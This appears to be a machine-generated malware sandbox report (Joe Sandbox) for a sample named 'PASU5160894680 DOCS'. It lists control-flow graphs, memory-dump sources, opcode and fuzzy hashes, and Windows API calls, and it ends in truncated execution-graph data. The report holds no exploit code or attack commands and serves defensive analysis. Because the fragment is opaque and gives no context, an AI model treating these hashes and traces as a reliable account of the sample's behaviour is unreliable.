1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7756c call 1a7757c call 1a7758c call 1a7759c * 20 1597->1600 1601 1a7a878 1598->1601 1599->1601 1691 1a7aeb2 1600->1691 1692 1a7ae8a-1a7ae96 1600->1692 1601->1600 1693 1a7aeb8-1a7afe5 call 1a775ac call 1a775bc call 1a7744c call 1a775cc call 1a775dc call 1a775ec 1691->1693 1694 1a7aea0-1a7aea6 1692->1694 1695 1a7ae98-1a7ae9e 1692->1695 1696 1a7aeb0 1694->1696 1695->1696 1696->1693
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pptq$$tq$$tq
                                                                • API String ID: 0-2504848753
                                                                • Opcode ID: 1b4ca379fba9f662541f92ece17ab35cfcc779102c9faca6643a57dc9b763593
                                                                • Instruction ID: 58aef7247e91d32aec72a71ba60b6289c4a0f6403db3f33dd91957fc99c556b9
                                                                • Opcode Fuzzy Hash: 1b4ca379fba9f662541f92ece17ab35cfcc779102c9faca6643a57dc9b763593
                                                                • Instruction Fuzzy Hash: 6163F934A01A598FCB64DF68CC94AAAB7B1FF99301F1145E9D409AB361DB30AEC5CF40
                                                                Function 01A70690 Relevance: .3, Instructions: 315COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68adc483de01f1173c8b70e8976041cb730789d861229fa1e2d2c05a48583423
                                                                • Instruction ID: 648e6d7fd81ca212508360709298b73469acc1d6d8d67ef6644fe9bb87e9e3a0
                                                                • Opcode Fuzzy Hash: 68adc483de01f1173c8b70e8976041cb730789d861229fa1e2d2c05a48583423
                                                                • Instruction Fuzzy Hash: F912A2F05017468AE771DF25E8DC1893BB2BB85318F984729D2612F2E9DBB8164BCF44
                                                                Function 01A70680 Relevance: .2, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86543bbe8d21a01da538ca5779cfcdfedd6c68403038d6d8726477ad9bc366cb
                                                                • Instruction ID: 3fca9f2dcc495dcd3f499a5893a70079f32222ff7a063cb1eb207f75e5b8afc9
                                                                • Opcode Fuzzy Hash: 86543bbe8d21a01da538ca5779cfcdfedd6c68403038d6d8726477ad9bc366cb
                                                                • Instruction Fuzzy Hash: 8FC117B09007468BE771DF24E8D81897BB2FB85324F984729D1612F2E9DBB8164BCF44
                                                                Function 0185DA98 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1716 185da98-185db27 GetCurrentProcess 1720 185db30-185db64 GetCurrentThread 1716->1720 1721 185db29-185db2f 1716->1721 1722 185db66-185db6c 1720->1722 1723 185db6d-185dba1 GetCurrentProcess 1720->1723 1721->1720 1722->1723 1725 185dba3-185dba9 1723->1725 1726 185dbaa-185dbc2 1723->1726 1725->1726 1729 185dbcb-185dbfa GetCurrentThreadId 1726->1729 1730 185dc03-185dc65 1729->1730 1731 185dbfc-185dc02 1729->1731 1731->1730
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 0185DB16
                                                                • GetCurrentThread.KERNEL32 ref: 0185DB53
                                                                • GetCurrentProcess.KERNEL32 ref: 0185DB90
                                                                • GetCurrentThreadId.KERNEL32 ref: 0185DBE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: c0ee31e214f4a3cb4c40d56939f830a01016fb1028647d251d64591bee27883b
                                                                • Instruction ID: f1410e44037878cc7dff8e9ff1d516a117f9341b47ba9e4cdf7d0e280282b15a
                                                                • Opcode Fuzzy Hash: c0ee31e214f4a3cb4c40d56939f830a01016fb1028647d251d64591bee27883b
                                                                • Instruction Fuzzy Hash: 0D5163B0900249DFDB58CFAAD948BDEBBF1FF88314F208119E919A7260D7346944CB26
                                                                Function 0185B3F8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1828 185b3f8-185b417 1829 185b443-185b447 1828->1829 1830 185b419-185b426 call 1859a34 1828->1830 1832 185b449-185b453 1829->1832 1833 185b45b-185b49c 1829->1833 1836 185b43c 1830->1836 1837 185b428 1830->1837 1832->1833 1839 185b49e-185b4a6 1833->1839 1840 185b4a9-185b4b7 1833->1840 1836->1829 1885 185b42e call 185b690 1837->1885 1886 185b42e call 185b6a0 1837->1886 1839->1840 1841 185b4b9-185b4be 1840->1841 1842 185b4db-185b4dd 1840->1842 1844 185b4c0-185b4c7 call 185a770 1841->1844 1845 185b4c9 1841->1845 1847 185b4e0-185b4e7 1842->1847 1843 185b434-185b436 1843->1836 1846 185b578-185b638 1843->1846 1849 185b4cb-185b4d9 1844->1849 1845->1849 1878 185b640-185b66b GetModuleHandleW 1846->1878 1879 185b63a-185b63d 1846->1879 1850 185b4f4-185b4fb 1847->1850 1851 185b4e9-185b4f1 1847->1851 1849->1847 1854 185b4fd-185b505 1850->1854 1855 185b508-185b511 call 185a780 1850->1855 1851->1850 1854->1855 1859 185b513-185b51b 1855->1859 1860 185b51e-185b523 1855->1860 1859->1860 1861 185b525-185b52c 1860->1861 1862 185b541-185b545 1860->1862 1861->1862 1864 185b52e-185b53e call 185a790 call 185a7a0 1861->1864 1883 185b548 call 185b990 1862->1883 1884 185b548 call 185b9a0 1862->1884 1864->1862 1867 185b54b-185b54e 1869 185b571-185b577 1867->1869 1870 185b550-185b56e 1867->1870 1870->1869 1880 185b674-185b688 1878->1880 1881 185b66d-185b673 1878->1881 1879->1878 1881->1880 1883->1867 1884->1867 1885->1843 1886->1843
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B65E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 66421266b8de39987c53a0f7bfc59464afe3ee79ecb2ff319c50afc1205cd38d
                                                                • Instruction ID: 685339317886320cd96599439ef8cdb05bb4d8541ecb616ca02b6b07a7aa2489
                                                                • Opcode Fuzzy Hash: 66421266b8de39987c53a0f7bfc59464afe3ee79ecb2ff319c50afc1205cd38d
                                                                • Instruction Fuzzy Hash: 01815670A00B458FD765CF2AD48075ABBF2FF88314F008A2DD88ADBA51D774E945CB91
                                                                Function 01A71F25 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1887 1a71f25-1a71f96 1888 1a71fa1-1a71fa8 1887->1888 1889 1a71f98-1a71f9e 1887->1889 1890 1a71fb3-1a72052 CreateWindowExW 1888->1890 1891 1a71faa-1a71fb0 1888->1891 1889->1888 1893 1a72054-1a7205a 1890->1893 1894 1a7205b-1a72093 1890->1894 1891->1890 1893->1894 1898 1a72095-1a72098 1894->1898 1899 1a720a0 1894->1899 1898->1899 1900 1a720a1 1899->1900 1900->1900
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01A72042
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: d97cbc415690343939f14424a42bc5f48c7cec518acae163359c6a4b2f84fa03
                                                                • Instruction ID: 709a58fd56cec71b80f9fa745134510c6ffe44fd20ffffe1c58794dcfdbde178
                                                                • Opcode Fuzzy Hash: d97cbc415690343939f14424a42bc5f48c7cec518acae163359c6a4b2f84fa03
                                                                • Instruction Fuzzy Hash: 3151C0B1D10349DFDB15CF99C884ADEBFB6BF48310F64812AE819AB210D7759946CF90
                                                                Function 01A71F30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1901 1a71f30-1a71f96 1902 1a71fa1-1a71fa8 1901->1902 1903 1a71f98-1a71f9e 1901->1903 1904 1a71fb3-1a72052 CreateWindowExW 1902->1904 1905 1a71faa-1a71fb0 1902->1905 1903->1902 1907 1a72054-1a7205a 1904->1907 1908 1a7205b-1a72093 1904->1908 1905->1904 1907->1908 1912 1a72095-1a72098 1908->1912 1913 1a720a0 1908->1913 1912->1913 1914 1a720a1 1913->1914 1914->1914
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01A72042
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: a50055da43e40f78f5db9f4d37a27f3082be741d2374afa8c46305551c57944f
                                                                • Instruction ID: 5e57dd05115a7bdb9003902b8492c2577fbd00108f2ba8df8c30316729dbb40c
                                                                • Opcode Fuzzy Hash: a50055da43e40f78f5db9f4d37a27f3082be741d2374afa8c46305551c57944f
                                                                • Instruction Fuzzy Hash: 0B41A0B1D10349DFDB15CF9AC884ADEBFB6BF48310F64812AE819AB210D7759945CF90
                                                                Function 018545C8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1915 18545c8-1855dd9 CreateActCtxA 1918 1855de2-1855e3c 1915->1918 1919 1855ddb-1855de1 1915->1919 1926 1855e3e-1855e41 1918->1926 1927 1855e4b-1855e4f 1918->1927 1919->1918 1926->1927 1928 1855e51-1855e5d 1927->1928 1929 1855e60 1927->1929 1928->1929 1930 1855e61 1929->1930 1930->1930
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01855DC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: e289f57fe11937b618f57bce11ceaadc5e5ae0dbabf5743fabc9d996023d0046
                                                                • Instruction ID: cdf81e48c93b8891ca19a80dfffa7225921a0efb353ddbbdda0d27be5419dc70
                                                                • Opcode Fuzzy Hash: e289f57fe11937b618f57bce11ceaadc5e5ae0dbabf5743fabc9d996023d0046
                                                                • Instruction Fuzzy Hash: 7041B0B1C00719CADB24DFAAC884B9DBBF5FF48304F20806AD908AB251DB756946CF90
                                                                Function 01855D0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1932 1855d0c-1855dd9 CreateActCtxA 1934 1855de2-1855e3c 1932->1934 1935 1855ddb-1855de1 1932->1935 1942 1855e3e-1855e41 1934->1942 1943 1855e4b-1855e4f 1934->1943 1935->1934 1942->1943 1944 1855e51-1855e5d 1943->1944 1945 1855e60 1943->1945 1944->1945 1946 1855e61 1945->1946 1946->1946
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 01855DC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 83631508362466c6d19981b3d633a9069acf4961b09b4f781c3f66aa339d1620
                                                                • Instruction ID: 83f1162fdd0acf396cc65069322922001d4e32b7b2e90447f77a3a88701bb9fc
                                                                • Opcode Fuzzy Hash: 83631508362466c6d19981b3d633a9069acf4961b09b4f781c3f66aa339d1620
                                                                • Instruction Fuzzy Hash: 3541BFB1C00759CADB24CFA9C885ADEBBB5FF49304F20816AD808AB251DB756A46CF50
                                                                Function 01A74690 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1948 1a74690-1a746cc 1949 1a746d2-1a746d7 1948->1949 1950 1a7477c-1a7479c 1948->1950 1951 1a7472a-1a74762 CallWindowProcW 1949->1951 1952 1a746d9-1a74710 1949->1952 1956 1a7479f-1a747ac 1950->1956 1954 1a74764-1a7476a 1951->1954 1955 1a7476b-1a7477a 1951->1955 1959 1a74712-1a74718 1952->1959 1960 1a74719-1a74728 1952->1960 1954->1955 1955->1956 1959->1960 1960->1956
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 01A74751
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: e9295a4304a50b2c6116faabaf36cbc9122fd223ef4973bea89fb566ba5d11c5
                                                                • Instruction ID: 248dfe2799e120c68e97411d33c38f611dc4d3a71d3d61de4c306db3bc239d21
                                                                • Opcode Fuzzy Hash: e9295a4304a50b2c6116faabaf36cbc9122fd223ef4973bea89fb566ba5d11c5
                                                                • Instruction Fuzzy Hash: F64116B8900245DFDB14CF99C888AAAFBF5FF8D324F258459D519AB321D374A941CFA0
                                                                Function 0185DCE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1962 185dce0-185dd74 DuplicateHandle 1963 185dd76-185dd7c 1962->1963 1964 185dd7d-185dd9a 1962->1964 1963->1964
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185DD67
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 654876cf77754d91d8b88a1969ff7e10e8bdb01a4f2038d58c65d0ee332ded95
                                                                • Instruction ID: f9d3020dbe310cc854c631871998a0d6ab85de113ba8fcec8cae3f09e56bc5d3
                                                                • Opcode Fuzzy Hash: 654876cf77754d91d8b88a1969ff7e10e8bdb01a4f2038d58c65d0ee332ded95
                                                                • Instruction Fuzzy Hash: 9B21C4B5900248DFDB10CFAAD984ADEBFF8EB48320F14841AE914A7350D375A944CFA5
                                                                Function 0185B5F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1967 185b5f8-185b638 1968 185b640-185b66b GetModuleHandleW 1967->1968 1969 185b63a-185b63d 1967->1969 1970 185b674-185b688 1968->1970 1971 185b66d-185b673 1968->1971 1969->1968 1971->1970
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B65E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 1de96d871ddf0d323edcc55907faad8051f37f16898f00f0da5738e837b6e249
                                                                • Instruction ID: 99adcf388714c46b911ed86117470b846702f76cf1163a04457ad3d87b4bcb0d
                                                                • Opcode Fuzzy Hash: 1de96d871ddf0d323edcc55907faad8051f37f16898f00f0da5738e837b6e249
                                                                • Instruction Fuzzy Hash: B91110B5C00649CFDB20CF9AC844ADEFBF5EF88324F14852AD919A7610C379A645CFA1
                                                                Function 0157D3EC Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709947643.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_157d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 687985caed476945528a97145ad51192868c534ff403a13482436aec6bf05e8c
                                                                • Instruction ID: 24cf0f7bc0a1eddf225122eb96870aedc614945b16d23930bb929181c0eebd4b
                                                                • Opcode Fuzzy Hash: 687985caed476945528a97145ad51192868c534ff403a13482436aec6bf05e8c
                                                                • Instruction Fuzzy Hash: 8C212B71504204DFDB05DF54E5C1B66BFB6FF98320F24C969D9090F246C376E416C6A1
                                                                Function 0158D01C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 888eeb4287b0290c2e90d337cca6afa630db1c25f4852a634feefcb5fa283603
                                                                • Instruction ID: b6dd4182e3d7e7da1ef9e8d4ea0a3f845aacd30940ed293a4f99fba556826392
                                                                • Opcode Fuzzy Hash: 888eeb4287b0290c2e90d337cca6afa630db1c25f4852a634feefcb5fa283603
                                                                • Instruction Fuzzy Hash: 74212271604204DFDB15EF98D880B2ABBF5FB88314F24C96DE94A5F286D33AD407CA61
                                                                Function 0158D1D4 Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d9b42cb47fb07d35a1e10c98b9eb215c393964a70440b745e194310d651e210
                                                                • Instruction ID: 8cc17a6a3266c60f65e2174f6ab5c1d7a15c882a5cacc1b8576015887500d015
                                                                • Opcode Fuzzy Hash: 3d9b42cb47fb07d35a1e10c98b9eb215c393964a70440b745e194310d651e210
                                                                • Instruction Fuzzy Hash: 1521F571604204DFDB05EF98D5C0B26BBF5FB88324F24CA6DE94A5F292C33AD406CA61
                                                                Function 0158D006 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1538035843e7704e63ac88a08cd538ffcb82733237ddae632a0d02ac7bfeaf8b
                                                                • Instruction ID: 1cb11086c3f5bc5791c9e00d623b78867c15dde5a2b8b14cbf53ac0b8bc8756d
                                                                • Opcode Fuzzy Hash: 1538035843e7704e63ac88a08cd538ffcb82733237ddae632a0d02ac7bfeaf8b
                                                                • Instruction Fuzzy Hash: 3F217F75509380CFDB12DF64D590715BFB1FB46214F28C5DAD8498F2A7C33A980ACB62
                                                                Function 0157D3E7 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709947643.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_157d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                • Instruction ID: fa0c89db96170fcbe6dfe8583c4f3e3accd1d99ac3c9847e8679d8ce3ba561c6
                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                • Instruction Fuzzy Hash: D711DF72404280CFDB02CF44D5C4B5ABF72FF84320F24C6A9D9090B656C33AE45ACBA1
                                                                Function 0158D1CF Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                • Instruction ID: c37f2ba7da54ba59bca0f348fb2d30f86ae0627545a46c6cc6fe67e663f951c8
                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                • Instruction Fuzzy Hash: 0711BB75504280DFDB12DF58C5C0B19BBB1FB84324F24C6A9D84A4F296C33AD40ACB61

                                                                Non-executed Functions

                                                                Function 01ABC2F2 Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70d9a023b55ccc520aa44598a6656dcfa68a549799bfc09ebdd6a0bf8852c493
                                                                • Instruction ID: 7161d67fa20b41015087b483d0971f6d3ee659896a43d618bb9ae739d4dc6a03
                                                                • Opcode Fuzzy Hash: 70d9a023b55ccc520aa44598a6656dcfa68a549799bfc09ebdd6a0bf8852c493
                                                                • Instruction Fuzzy Hash: 3BD11A7592071BCACB01EBA4D991699F7B1FF99300F11D79AE40A3B260FB706AD4CB41
                                                                Function 01ABC300 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad0ea069e2b5444fbc1dfa38fa24135d56bfa5397648477a90bb3e231c39584b
                                                                • Instruction ID: f48d361c273e8bf609acd8bba8088aabe6f5a9715ad6e3206e1f32dad44e9807
                                                                • Opcode Fuzzy Hash: ad0ea069e2b5444fbc1dfa38fa24135d56bfa5397648477a90bb3e231c39584b
                                                                • Instruction Fuzzy Hash: D3D1097592071BCACB01EBA4D991699F7B1FF99300F11D79AE40A3B260FB706AD4CB41
                                                                Function 0185D9C4 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f1a3d9fe1c2c7dd660a6a22e7b31f639058dade143f3f56e7dcf020c4865f6e
                                                                • Instruction ID: 62c061ea1e2e7899d6de2b0486b5d84a46fa6d114c0b3acbd7ca4cfc3025014c
                                                                • Opcode Fuzzy Hash: 3f1a3d9fe1c2c7dd660a6a22e7b31f639058dade143f3f56e7dcf020c4865f6e
                                                                • Instruction Fuzzy Hash: 06A16E32A002198FCF19DFB9C88459EBBB2FF95300B15456AEE05EB265DB31EA05CB50
                                                                Function 01AB9480 Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6f540a815e37c03d53ebd3040b86046caa63f9e748af0f10c117a1cfbaf4b47
                                                                • Instruction ID: 791379aec2f21d032587f14f062e1ee4e4e7099c9be2f329e475d93e00398502
                                                                • Opcode Fuzzy Hash: f6f540a815e37c03d53ebd3040b86046caa63f9e748af0f10c117a1cfbaf4b47
                                                                • Instruction Fuzzy Hash: 8A1199B1E157589BEB28CF6B8C407CAFAF7BFC9300F04C1A9D509A6255EB3419858F51

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:5%
                                                                Signature Coverage:8.6%
                                                                Total number of Nodes:140
                                                                Total number of Limit Nodes:13
                                                                execution_graph 92582 5612b60 LdrInitializeThunk 92583 424703 92588 42471c 92583->92588 92584 4247ac 92585 424767 92591 42e0b3 92585->92591 92588->92584 92588->92585 92589 4247a7 92588->92589 92590 42e0b3 RtlFreeHeap 92589->92590 92590->92584 92594 42c383 92591->92594 92593 424777 92595 42c39d 92594->92595 92596 42c3ae RtlFreeHeap 92595->92596 92596->92593 92597 42b5c3 92598 42b5dd 92597->92598 92601 5612df0 LdrInitializeThunk 92598->92601 92599 42b605 92601->92599 92724 424373 92725 42438f 92724->92725 92726 4243b7 92725->92726 92727 4243cb 92725->92727 92728 42c003 NtClose 92726->92728 92729 42c003 NtClose 92727->92729 92731 4243c0 92728->92731 92730 4243d4 92729->92730 92734 42e1d3 RtlAllocateHeap 92730->92734 92733 4243df 92734->92733 92735 42f273 92736 42f283 92735->92736 92737 42f289 92735->92737 92738 42e193 RtlAllocateHeap 92737->92738 92739 42f2af 92738->92739 92602 41df63 92603 41df89 92602->92603 92607 41e083 92603->92607 92608 42f3a3 92603->92608 92605 41e021 92605->92607 92614 42b613 92605->92614 92609 42f313 92608->92609 92610 42f370 92609->92610 92618 42e193 92609->92618 92610->92605 92612 42f34d 92613 42e0b3 RtlFreeHeap 92612->92613 92613->92610 92615 42b630 92614->92615 92624 5612c0a 92615->92624 92616 42b65c 92616->92607 92621 42c333 92618->92621 92620 42e1ae 92620->92612 92622 42c34d 92621->92622 92623 42c35e RtlAllocateHeap 92622->92623 92623->92620 92625 5612c11 92624->92625 92626 5612c1f LdrInitializeThunk 92624->92626 92625->92616 92626->92616 92627 413ae3 92628 413afd 92627->92628 92633 417283 